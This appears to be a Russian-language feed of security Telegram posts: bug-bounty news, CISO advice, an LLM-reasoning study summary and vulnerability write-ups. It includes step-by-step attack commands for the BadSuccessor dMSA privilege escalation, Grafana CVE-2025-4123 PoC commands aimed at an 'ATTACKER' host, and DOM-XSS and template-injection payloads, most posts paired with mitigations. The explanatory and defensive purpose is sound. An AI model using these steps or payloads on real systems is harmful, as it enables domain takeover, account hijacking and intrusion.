Forwarded from Russian OSINT
This media is not supported in your browser
VIEW IN TELEGRAM
Интересное исследование ML-спецов из Apple, которое не оставило равнодушным ИИ-сообщество критиков, включая академические круги. Рекомендую самостоятельно изучить и дать оценку
Зачастую "ум" нейросетей измеряют на стандартных бенчмарках AIME или MATH, но проблема заключается в их так называемом "загрязнении". Иначе говоря, по утверждению ученых, есть высокая вероятность того, что задачи и ответы этих тестов попадают в датасет обучения ИИ-моделей. Это примерно как студент приходит на экзамен с готовыми шпорами на свой билет без надзирателя.
Ученые решили подойти к исследованию нестандартно. Они взяли данные не из интернета, а "стерильные" алгоритмические головоломки для объективности. Главные из них — "Башня Ханоя", "Прыжки шашек", "Мир блоков"и "Переправа через реку".
Ханойская башня (пример) — перестановочная головоломка в виде трёх стержней, на один из которых в виде пирамиды нанизаны восемь колец разного диаметра. Задача состоит в том, чтобы переместить пирамиду из колец на другой стержень за наименьшее число ходов. За один раз разрешается переносить только одно кольцо, причём нельзя класть большее кольцо на меньшее.
Например, популярные
О чём это говорит? 🤔Ученые делают вывод, что ИИ-модели не понимают рекурсивный принцип. Они лишь воспроизводят короткие последовательности, которые, вероятно, "видели" при обучении. По сути, идёт бурная имитация деятельности, а не процесс "размышления".
💡Интересный момент: DeepSeek-R1 в "Башня Ханоя"сдаётся без боя на ♟длинной дистанции. Когда количество колец достигает 15, то модель, вместо того чтобы "думать" ещё усерднее, резко сокращает объем рассуждений до 2000-4000 токенов, выдавая быстрый + неверный ответ. Алгоритмы столкнувшись с задачей выше определённого порога сложности перестают справляться и весь процесс "рассуждения" ломается.
Модель Claude 3.7 Sonnet имеет "thinking" режим. Выяснилось, что обычный режим работает быстрее и даже надёжнее на короткой дистанции, а вот "мыслящая" версия склонна к "overthinking" на длинной дистанции. В конце она путается в собственных рассуждениях. На задачах средней сложности "мыслящий" режим действительно неплох. На короткой лучше использовать обычную версию.
Работа ученых из Apple является "холодным душем" для всех, кто уже поверил в появление мыслящего ИИ. Ученые намекают на то, что мы находимся в эпоху "иллюзий", где невероятно сложные технологии имитации принимаются за подлинный интеллект.
💡Вывод: GPT-4o, Claude 3.5 Sonnet, Gemini 1.5 Pro, Llama 3, DeepSeek-V2, Mistral Large, и Grok — все они "имитаторы" или, говоря более научно, универсальные аппроксиматоры. Современные LLM это не более чем системы предсказания следующего слова (или токена). Вся их "магия" основана на статистических закономерностях, извлеченных из гигантских объемов текста.
🤖 ИИ не может рассуждать как человек, а главное🧠 творить и созидать. Нет духа. Нет божественной искры.
Please open Telegram to view this post
VIEW IN TELEGRAM
🕊2💯1
Russian OSINT
Будущее пентеста be like:
Особенно смешно что новшество(новая позиция) в похеке это Mlsecops, пентест аи, по сути работающего как акинатор
A Comprehensive Guide to AI Security for CISOs: Challenges, Strategies, and Measuring Success
https://bigid.com/blog/a-ciso-guide-to-ai-security/
https://bigid.com/blog/a-ciso-guide-to-ai-security/
BigID
A CISO’s Guide to AI Security
A Comprehensive Guide to AI Security for CISOs: Challenges, Strategies, and Measuring Success As Chief Information Security Officers (CISOs), the responsibility to safeguard an enterprise’s sensitive data grows …
Forwarded from Пост Лукацкого
Словил инсайт 💡 после нескольких последних выступлений про кибербез с точки зрения бизнеса. Какие бы фреймворки и методологии вы не использовали, остается один момент, который сложно описать и формализовать. Речь о первом контакте с топ-менеджером(ами) 🧐
Вы можете все прекрасно рассчитать🧮 , правильно оценить ущерб, составить список событий с катастрофическими последствиями (хотя это не вы должны его составлять, а топы как раз), рассчитать ROI от внедряемых средств защиты и даже предложить несколько альтернатив. Но все это будет бесполезно 🤷♀️ , если у вас нет кредита доверия от CEO.
И вот как его заработать - это и есть основная задача ИБ🤔 И это несложно, на самом деле, но не быстро.
По моим оценкам должно пройти не меньше2️⃣ (в идеале) лет, прежде чем вам начнуть доверять. И все это время вы должны стучаться в закрытую дверь 🚪 Ее обязательно откроют, но не все дожидаются, уходя через 2-3 года на новое место работы 🚶
Многие выбирают путь наименьшего сопротивления🛡 - заниматься compliance, решать технические вопросы, приобретать средства ИБ, устранять уязвимости, прокачивать технические скиллы у сотрудников на киберполигонах… Потому что это все дает быстрый и видимый результат… для ИБшника, не для бизнеса. Так и живем… 😔
#бизнес #ciso
Вы можете все прекрасно рассчитать
И вот как его заработать - это и есть основная задача ИБ
По моим оценкам должно пройти не меньше
Многие выбирают путь наименьшего сопротивления
#бизнес #ciso
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
Дыра в щите Cloudflare: как атака на Jabber.ru вскрыла проблему, о которой молчат c 2023
Приятного прочтения
Да, белый пушистый лис не объявит себя до некоторого времени, но, как показывает практика, он гарантированно придёт. И лучше закрыть эту дыру сейчас, чем потом разгребать последствия, как это пришлось делать администраторам jabber.ru.
Приятного прочтения
Хабр
Дыра в щите Cloudflare: как атака на Jabber.ru вскрыла проблему, о которой молчат c 2023
Когда думаешь, что под надёжной защитой, но дьявол, как всегда, в деталях Думаю, многие помнят позапрошлогодний инцидент с Man-in-the-Middle атакой на XMPP-сервис jabber.ru . Эта история наделала...
🔥 Заскочили за самыми сочными баунти-и-не-только новостями — раздаём одним потоком!
Пока вы доливаете кофе, исследователь [Monika Sharma](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4) сварила эксплойт-коктейль из *proxy-misconfig* + SSRF и с кастетом ворвалась во внутреннюю админку. Итог — солидный чек и урок: «мелочи», собранные в цепочку, иногда громче 0-day.
В соседнем BI-зоопарке [Pentaho Business Server](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73) снова споткнулся о «дефолтные креды + злой отчёт» — и получил RCE. Репорт-директор без строгих ограничений = удалённая шелуха.
А вот XWiki выдала CVE-2025-32969 (CVSS 9.8) — слепой SQL-инжект даже при полном бане анонимов. Патч до 16.10.1 обязателен, иначе ваши вики-мысли могут читать все, кроме вас. 🔨 [Детали](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)
На большом полит-ринге жюри приговорило NSO Group к $168 млн за Pegasus-атаку на WhatsApp — [хроника исторического пенальти](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack). Meta открыла шампанское, но эксперты ворчат: «Pegasus сменит шкуру и вернётся».
IoT-периферия тоже фонтанирует: хулиганы уже впрягли дырявые GeoVision и [Samsung MagicINFO](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html) в свежий Mirai-ботнет. Любите яркие уличные дисплеи? Проверьте, чтобы они не светили *DDoS incoming*.
И на десерт — Kali GPT: представьте ChatGPT в худи Kali Linux, который шепчет
👉 Вывод: патчимся быстро, баги ищем изобретательно; словили инсайт — жмите 🔥, кидайте друзьям-хакерам и пишите, какой баг сделал ваш июнь!
---
Источники
1. [Proxy Misconfiguration + SSRF — InfoSec Write-ups](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4)
2. [RCE в Pentaho Business Server — InfoSec Write-ups](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73)
3. [CVE-2025-32969 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)
4. [NSO Group vs WhatsApp — The Record](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack)
5. [Mirai через Samsung MagicINFO & GeoVision — The Hacker News](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html)
6. [“AI MEET HACKING — Kali GPT” — Medium](https://medium.com/p/0d726e73b733)
Пока вы доливаете кофе, исследователь [Monika Sharma](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4) сварила эксплойт-коктейль из *proxy-misconfig* + SSRF и с кастетом ворвалась во внутреннюю админку. Итог — солидный чек и урок: «мелочи», собранные в цепочку, иногда громче 0-day.
В соседнем BI-зоопарке [Pentaho Business Server](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73) снова споткнулся о «дефолтные креды + злой отчёт» — и получил RCE. Репорт-директор без строгих ограничений = удалённая шелуха.
А вот XWiki выдала CVE-2025-32969 (CVSS 9.8) — слепой SQL-инжект даже при полном бане анонимов. Патч до 16.10.1 обязателен, иначе ваши вики-мысли могут читать все, кроме вас. 🔨 [Детали](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)
На большом полит-ринге жюри приговорило NSO Group к $168 млн за Pegasus-атаку на WhatsApp — [хроника исторического пенальти](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack). Meta открыла шампанское, но эксперты ворчат: «Pegasus сменит шкуру и вернётся».
IoT-периферия тоже фонтанирует: хулиганы уже впрягли дырявые GeoVision и [Samsung MagicINFO](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html) в свежий Mirai-ботнет. Любите яркие уличные дисплеи? Проверьте, чтобы они не светили *DDoS incoming*.
И на десерт — Kali GPT: представьте ChatGPT в худи Kali Linux, который шепчет
nmap -sC -sV, спорит о payload-ах и учит обходить WAF. Машины обучают нас ломать машины — круг замкнулся. 👉 Вывод: патчимся быстро, баги ищем изобретательно; словили инсайт — жмите 🔥, кидайте друзьям-хакерам и пишите, какой баг сделал ваш июнь!
---
Источники
1. [Proxy Misconfiguration + SSRF — InfoSec Write-ups](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4)
2. [RCE в Pentaho Business Server — InfoSec Write-ups](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73)
3. [CVE-2025-32969 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)
4. [NSO Group vs WhatsApp — The Record](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack)
5. [Mirai через Samsung MagicINFO & GeoVision — The Hacker News](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html)
6. [“AI MEET HACKING — Kali GPT” — Medium](https://medium.com/p/0d726e73b733)
Medium
Proxy Misconfiguration + SSRF: How I Chained Two Bugs Into Internal Admin Panel Access
From harmless URL fetchers to internal service compromise — a deep dive into a high-severity bug bounty chain
👏1
🔥 BadSuccessor — свежая головная боль для админов AD
В мае 2025 г. исследователи показали, как с нуля получить права Domain Admins через новую функцию Windows Server 2025 — *delegated Managed Service Accounts* (dMSA).
Во время миграции сервис‑аккаунтов контроллер домена по ошибке добавляет в PAC dMSA SID старого аккаунта и все его группы.
Это даёт атакующему прямой лифт вверх по привилегиям.
Как пройти путь до домена‑админа в четыре шага
1. Нужны права CreateChild на любую OU. Такие права часто лежат у технических учёток.
2. Создаём собственный dMSA:
3. Меняем два атрибута:
4. Запрашиваем TGT через модифицированный Rubeus:
В ответном PAC уже сидят SID групп Domain Admins, и мы сразу правим доменом — без смены паролей и без добавления себя в группы.
Почему SOC почти ничего не увидит
* Мы не трогаем объект администратора, триггер «добавили в Domain Admins» молчит.
* Идут обычные LDAP‑ и Kerberos‑запросы, IDS считает трафик нормальным.
* Патча и CVE нет — Microsoft пока думает.
Как закрыть брешь
* Проверьте ACL и заберите право Create msDS-DelegatedMSA там, где оно не нужно.
* Если dMSA не используете, временно отключите их:
* Ловите события 5136 и 4662 по изменению двух атрибутов и связывайте их с выдачей TGT тому же dMSA в течение пяти минут.
* Добавьте сигнатуры на PoC‑файлы:
Эксплойт в паблике с 21 мая 2025 г. Проверьте, не появился ли у вас собственный «преемник‑админ». 💀
В мае 2025 г. исследователи показали, как с нуля получить права Domain Admins через новую функцию Windows Server 2025 — *delegated Managed Service Accounts* (dMSA).
Во время миграции сервис‑аккаунтов контроллер домена по ошибке добавляет в PAC dMSA SID старого аккаунта и все его группы.
Это даёт атакующему прямой лифт вверх по привилегиям.
Как пройти путь до домена‑админа в четыре шага
1. Нужны права CreateChild на любую OU. Такие права часто лежат у технических учёток.
2. Создаём собственный dMSA:
New-ADServiceAccount evil$ …
3. Меняем два атрибута:
msDS-ManagedAccountPrecededByLink → DN цели (пример: Administrator)
msDS-DelegatedMSAState → 2
4. Запрашиваем TGT через модифицированный Rubeus:
Rubeus asktgt /user:evil$ /dmsa
В ответном PAC уже сидят SID групп Domain Admins, и мы сразу правим доменом — без смены паролей и без добавления себя в группы.
Почему SOC почти ничего не увидит
* Мы не трогаем объект администратора, триггер «добавили в Domain Admins» молчит.
* Идут обычные LDAP‑ и Kerberos‑запросы, IDS считает трафик нормальным.
* Патча и CVE нет — Microsoft пока думает.
Как закрыть брешь
* Проверьте ACL и заберите право Create msDS-DelegatedMSA там, где оно не нужно.
* Если dMSA не используете, временно отключите их:
HKLM\System\CurrentControlSet\Control\Lsa\EnableDMSA = 0
* Ловите события 5136 и 4662 по изменению двух атрибутов и связывайте их с выдачей TGT тому же dMSA в течение пяти минут.
* Добавьте сигнатуры на PoC‑файлы:
SharpSuccessor*, BadSuccessor*, Rubeus-dmsa.Эксплойт в паблике с 21 мая 2025 г. Проверьте, не появился ли у вас собственный «преемник‑админ». 💀
🔥1🤩1
🛠 #BugBounty | Grafana CVE‑2025‑4123
Что случилось. 21 мая 2025 года вышел патч Grafana 12.0.0+security‑01. Он закрывает цепочку из трёх багов, которая давала полный захват аккаунта и доступ к внутренней сети. Уязвимость жила в проде примерно полтора года.
Как работает атака.
1. Статический хендлер принимает любой путь после /public/. Он нормализует его и, если папка существует, отвечает 302 Found. Go‑функция http.Redirect сначала разбирает «?», потом путь. На диске остаётся верный каталог, а в 302‑заголовке уходит protocol‑relative ссылка //attacker.com/… — открытый редирект.
2. Во фронтенде есть client‑side path traversal: /invite/..%2f..%2f…
3. Для рендеринга дашбордов Grafana поднимает headless Chromium и принимает только относительные пути. Мы соединяем редирект и traversal. Headless‑браузер идёт во внутренний сервис (полный SSRF). Одновременно traversal подсовывает плагин с нашего сервера. В его манифесте поле module указывает на вредный JS. Браузер запускает скрипт, и мы меняем e‑mail и пароль жертвы.
Как повторить.
Скрипт покажет две ссылки: первая вызывает XSS, вторая — SSRF.
Почему цепочка в бб самая яркая за май. Цепочка «open redirect → client traversal → headless SSRF» встречается редко. Всё начинается с мелкого редиректа, а заканчивается полным захватом. Intigriti платит за такие репорты 6–10 k €. Отчёт приняли меньше чем за сутки. PoC на GitHub собрал 30+ звёзд за неделю.
Как защититься.
• Обновитесь до 12.0.0+security‑01 или свежих патч‑релизов 11.x.
• Если image renderer не нужен, отключите /render/*.
• На реверсе блокируйте protocol‑relative URL и закройте /render/* от внешки.
• Добавьте CSP: frame‑src 'none'; script‑src 'self'. Это режет XSS, хотя не закрывает SSRF.
Источники:
— Grafana Labs, security release CVE‑2025‑4123, 21.05.25.
— Balada A., «Grafana CVE‑2025‑4123: Full‑Read SSRF & Account Takeover», 22.05.25.
— NightBloodz, «CVE‑2025‑4123 Exploit PoC», GitHub, 02.06.25.
Что случилось. 21 мая 2025 года вышел патч Grafana 12.0.0+security‑01. Он закрывает цепочку из трёх багов, которая давала полный захват аккаунта и доступ к внутренней сети. Уязвимость жила в проде примерно полтора года.
Как работает атака.
1. Статический хендлер принимает любой путь после /public/. Он нормализует его и, если папка существует, отвечает 302 Found. Go‑функция http.Redirect сначала разбирает «?», потом путь. На диске остаётся верный каталог, а в 302‑заголовке уходит protocol‑relative ссылка //attacker.com/… — открытый редирект.
2. Во фронтенде есть client‑side path traversal: /invite/..%2f..%2f…
3. Для рендеринга дашбордов Grafana поднимает headless Chromium и принимает только относительные пути. Мы соединяем редирект и traversal. Headless‑браузер идёт во внутренний сервис (полный SSRF). Одновременно traversal подсовывает плагин с нашего сервера. В его манифесте поле module указывает на вредный JS. Браузер запускает скрипт, и мы меняем e‑mail и пароль жертвы.
Как повторить.
git clone https://github.com/NightBloodz/CVE-2025-4123
cd CVE-2025-4123 && sudo python server.py --host http://ATTACKER
Скрипт покажет две ссылки: первая вызывает XSS, вторая — SSRF.
Почему цепочка в бб самая яркая за май. Цепочка «open redirect → client traversal → headless SSRF» встречается редко. Всё начинается с мелкого редиректа, а заканчивается полным захватом. Intigriti платит за такие репорты 6–10 k €. Отчёт приняли меньше чем за сутки. PoC на GitHub собрал 30+ звёзд за неделю.
Как защититься.
• Обновитесь до 12.0.0+security‑01 или свежих патч‑релизов 11.x.
• Если image renderer не нужен, отключите /render/*.
• На реверсе блокируйте protocol‑relative URL и закройте /render/* от внешки.
• Добавьте CSP: frame‑src 'none'; script‑src 'self'. Это режет XSS, хотя не закрывает SSRF.
Источники:
— Grafana Labs, security release CVE‑2025‑4123, 21.05.25.
— Balada A., «Grafana CVE‑2025‑4123: Full‑Read SSRF & Account Takeover», 22.05.25.
— NightBloodz, «CVE‑2025‑4123 Exploit PoC», GitHub, 02.06.25.
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
🔥3🕊1
🔒 Bitrix — боль даже для закалённых AppSec-спецов
«Привет, я пентестер, которому снова достался портал на 1С‑Bitrix. Делюсь реальным опытом описания чудовищ которых приходится аудитить.»
«Не призывай то, что не сможешь укротить.» — Г. Ф. Лавкрафт
1. Это не CMS, а швейцарский нож боли, где каждое лезвие может порезать. CRM, телефония, диски, почта, DAV — поверхность атаки размером с планету.
2. Legacy‑PHP на стероидах.
Ядро Bitrix — крупный PHP‑монолит, наследующий практики ≈ PHP 5/7: глобальные переменные, динамические include, слабая типизация. При аудите это приводит к каскадам потенциальных XSS/SQLi, а исправление одного модуля часто требует правки ядра, что ломает обратную совместимость. Даже сами разработчики предупреждают, что изменение ядра лишает возможности получать патчи — значит, команда безопасности оказывается перед выбором «фикс или апдейт, но не оба» .
3. RCE прилетают как времена года. Последние: CVE‑2024‑34883 и CVE‑2023‑1714. Вопрос всего один: кто победит в гонке — патч или хакер?
4. Пароли светятся как ёлка. SMTP/LDAP/DAV‑секреты хранятся почти в plain‑text и легко вытаскиваются через API.
5. «У нас встроенный WAF, всё нормально!» — говорят админы и спокойно спят... пока одна десериализация не превращает сон в кошмар.
6. Обновить страшно, не обновлять — страшнее. Кастомные модули + бизнес‑логику никто не тестил; патч может всё сломать, поэтому люди живут на версиях 2022 года.
Что сделать уже завтра?
Снести.
Выключить ненужные модули и интеграции.
Перенести Bitrix в отдельный сегмент, спрятать за реальным WAF/IPS.
Настроить автоматические обновления и CI/CD.
Пентест — раз в год, мониторинг CVE — ежемесячно.
Критичное постепенно выносить в микросервисы/серверлесс.
#Bitrix #AppSec #Pentest #CVE #InfoSec 🚀
«Привет, я пентестер, которому снова достался портал на 1С‑Bitrix. Делюсь реальным опытом описания чудовищ которых приходится аудитить.»
«Не призывай то, что не сможешь укротить.» — Г. Ф. Лавкрафт
1. Это не CMS, а швейцарский нож боли, где каждое лезвие может порезать. CRM, телефония, диски, почта, DAV — поверхность атаки размером с планету.
2. Legacy‑PHP на стероидах.
Ядро Bitrix — крупный PHP‑монолит, наследующий практики ≈ PHP 5/7: глобальные переменные, динамические include, слабая типизация. При аудите это приводит к каскадам потенциальных XSS/SQLi, а исправление одного модуля часто требует правки ядра, что ломает обратную совместимость. Даже сами разработчики предупреждают, что изменение ядра лишает возможности получать патчи — значит, команда безопасности оказывается перед выбором «фикс или апдейт, но не оба» .
3. RCE прилетают как времена года. Последние: CVE‑2024‑34883 и CVE‑2023‑1714. Вопрос всего один: кто победит в гонке — патч или хакер?
4. Пароли светятся как ёлка. SMTP/LDAP/DAV‑секреты хранятся почти в plain‑text и легко вытаскиваются через API.
5. «У нас встроенный WAF, всё нормально!» — говорят админы и спокойно спят... пока одна десериализация не превращает сон в кошмар.
6. Обновить страшно, не обновлять — страшнее. Кастомные модули + бизнес‑логику никто не тестил; патч может всё сломать, поэтому люди живут на версиях 2022 года.
Что сделать уже завтра?
Выключить ненужные модули и интеграции.
Перенести Bitrix в отдельный сегмент, спрятать за реальным WAF/IPS.
Настроить автоматические обновления и CI/CD.
Пентест — раз в год, мониторинг CVE — ежемесячно.
Критичное постепенно выносить в микросервисы/серверлесс.
#Bitrix #AppSec #Pentest #CVE #InfoSec 🚀
🔥2
Итого: безопасность Bitrix осложняют не столько отдельные баги, сколько сочетание монолитного устаревшего ядра, повторяющихся ошибок в защите конфиденциальных данных, высокой доли непатченных инсталляций и культурно‑экономической модели, при которой кастомизация важнее своевременных апдейтов. Пока не изменятся процессы разработки и распространения, «постоянно закрывать новые дыры» — единственная реальная стратегия.
❤1
📌 DOM‑XSS: полный разбор — от простых багов до экстремальных цепочек
---
1. Что такое DOM‑XSS
• Вредоносный JavaScript рождается в *браузере*, а не в HTTP‑ответе.
• ИСТОЧНИКИ:
• СИНКИ:
2. Чем DOM‑XSS отличается от остальных
3. Классика
4. Средний уровень
• mXSS: мутирующая разметка обходит DOMPurify.
• DOM‑clobbering: подмена
• CSTI:
5. Эксперт‑зона (экстремальные цепочки)
1. mXSS + sanitizer bypass: «сломанный»
2. Clobbering ⇒ CSP bypass ⇒ SW hijack: подменяем узел и перехватываем Service Worker.
3. Prototype pollution ⇒ React sink:
4. Scriptless XSS via:
---
1. Что такое DOM‑XSS
• Вредоносный JavaScript рождается в *браузере*, а не в HTTP‑ответе.
• ИСТОЧНИКИ:
location, hash, search, cookies, postMessage, Web‑Storage.• СИНКИ:
innerHTML, document.write(), insertAdjacentHTML(), dangerouslySetInnerHTML, setAttribute().2. Чем DOM‑XSS отличается от остальных
Тип | Где payload | Когда выполняется | Ошибка
------------- | ------------- | ------------------ | ---------
Stored | сервер | при каждом рендере | backend
Reflected | HTTP‑ответ | сразу после клика | backend
DOM‑XSS | браузер | при работе JS | frontend
3. Классика
// hash → innerHTML
document.body.innerHTML = location.hash.substr(1);
// search → document.write
document.write(decodeURIComponent(location.search));
// jQuery ≤ 3.4.1
$(...).html('<img src=x onerror=alert(1)>');
4. Средний уровень
• mXSS: мутирующая разметка обходит DOMPurify.
• DOM‑clobbering: подмена
document.forms[0], window.name.• CSTI:
{{constructor.constructor('alert(1)')()}} в Handlebars/Vue ≤ 2.6.5. Эксперт‑зона (экстремальные цепочки)
1. mXSS + sanitizer bypass: «сломанный»
<svg> выживает очистку и мутирует в XSS.2. Clobbering ⇒ CSP bypass ⇒ SW hijack: подменяем узел и перехватываем Service Worker.
3. Prototype pollution ⇒ React sink:
location.hash → Object.prototype → innerHTML.4. Scriptless XSS via:
values="javascript:…", CSP‑friendly.🔥2
Forwarded from Похек
AI & LLM & ML BugBounty Hacktivity
#ai #llm #ml #bugbounty #jailbreak #llama #huggingface
Если вам интересна тема пентеста LLM, AI, ML, как багхантить такие штуки и т.д., то извечным способом улучшения насмотренности и понимания направления - хороший способом считается читать чужие репорты на бб.
🔗 Huntr Hacktivity
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#ai #llm #ml #bugbounty #jailbreak #llama #huggingface
Если вам интересна тема пентеста LLM, AI, ML, как багхантить такие штуки и т.д., то извечным способом улучшения насмотренности и понимания направления - хороший способом считается читать чужие репорты на бб.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔓 EXPLOIT‑дайджест
Пятница выдалась жаркой: пока многие жарят шашлыки, уязвимости жарят продакшн‑серверы.
— — —
1️⃣ RCE в WebDAV (CVE‑2025‑33053)
Один клик по специально сформированному .url — и удалённое выполнение кода на всех поддерживаемых версиях Windows. Microsoft уже выкатил патч, но PoC ходит по закрытым каналам.
Временная затычка: отключите службу WebClient и запретите WebDAV‑трафик на периметре.
2️⃣ «Три двойки» Cloudflare: 503 × 2 ч 28 мин
12 июня глобальный сбой уложил Workers KV, Access, Turnstile и часть дашборда. Причина — сбой стороннего хранилища.
3️⃣ WordPress Workreap ≤ 3.3.2 (CVE‑2025‑5012)
200 k+ сайтов открыты для произвольной загрузки файлов даже подписчиками. Кладём `resume.php` — получаем shell. Версия 3.3.3 уже содержит фикс; проверьте автообновление.
4️⃣ Google Сhrome залатал две high‑severity🚒 дыры — UAF (CVE‑2025‑5063) и OOB write (CVE‑2025‑5280). Госагентствам США приказано патчиться до 5 июня.
5️⃣ Pentest‑ИИ: PentestGPT vs Mindgard
• PentestGPT — терминальный «ментор», быстро штампуеткорявые payload‑ы, но буксует на lateral movement (на самом деле он просто не очень мягко говоря)
• Mindgard — взял «Лучший AI‑Sec стартап 2025», уже встроен в GitLab CI
Пятница выдалась жаркой: пока многие жарят шашлыки, уязвимости жарят продакшн‑серверы.
— — —
1️⃣ RCE в WebDAV (CVE‑2025‑33053)
Один клик по специально сформированному .url — и удалённое выполнение кода на всех поддерживаемых версиях Windows. Microsoft уже выкатил патч, но PoC ходит по закрытым каналам.
Временная затычка: отключите службу WebClient и запретите WebDAV‑трафик на периметре.
2️⃣ «Три двойки» Cloudflare: 503 × 2 ч 28 мин
12 июня глобальный сбой уложил Workers KV, Access, Turnstile и часть дашборда. Причина — сбой стороннего хранилища.
3️⃣ WordPress Workreap ≤ 3.3.2 (CVE‑2025‑5012)
200 k+ сайтов открыты для произвольной загрузки файлов даже подписчиками. Кладём `resume.php` — получаем shell. Версия 3.3.3 уже содержит фикс; проверьте автообновление.
4️⃣ Google Сhrome залатал две high‑severity🚒 дыры — UAF (CVE‑2025‑5063) и OOB write (CVE‑2025‑5280). Госагентствам США приказано патчиться до 5 июня.
5️⃣ Pentest‑ИИ: PentestGPT vs Mindgard
• PentestGPT — терминальный «ментор», быстро штампует
• Mindgard — взял «Лучший AI‑Sec стартап 2025», уже встроен в GitLab CI
🌭1
#Beacon
🛠 #BugBounty | Grafana CVE‑2025‑4123 Что случилось. 21 мая 2025 года вышел патч Grafana 12.0.0+security‑01. Он закрывает цепочку из трёх багов, которая давала полный захват аккаунта и доступ к внутренней сети. Уязвимость жила в проде примерно полтора года.…
Telegram
[DeteAct] Оценка защищённости
Server-Side XSS → SSRF → Компрометация облачной инфраструктуры: как одна картинка стоила целого облака
В этой статье разберем атаку, начавшуюся с уязвимости XSS в генераторе изображений и завершившуюся получением полного доступа к облачной инфраструктуре.…
В этой статье разберем атаку, начавшуюся с уязвимости XSS в генераторе изображений и завершившуюся получением полного доступа к облачной инфраструктуре.…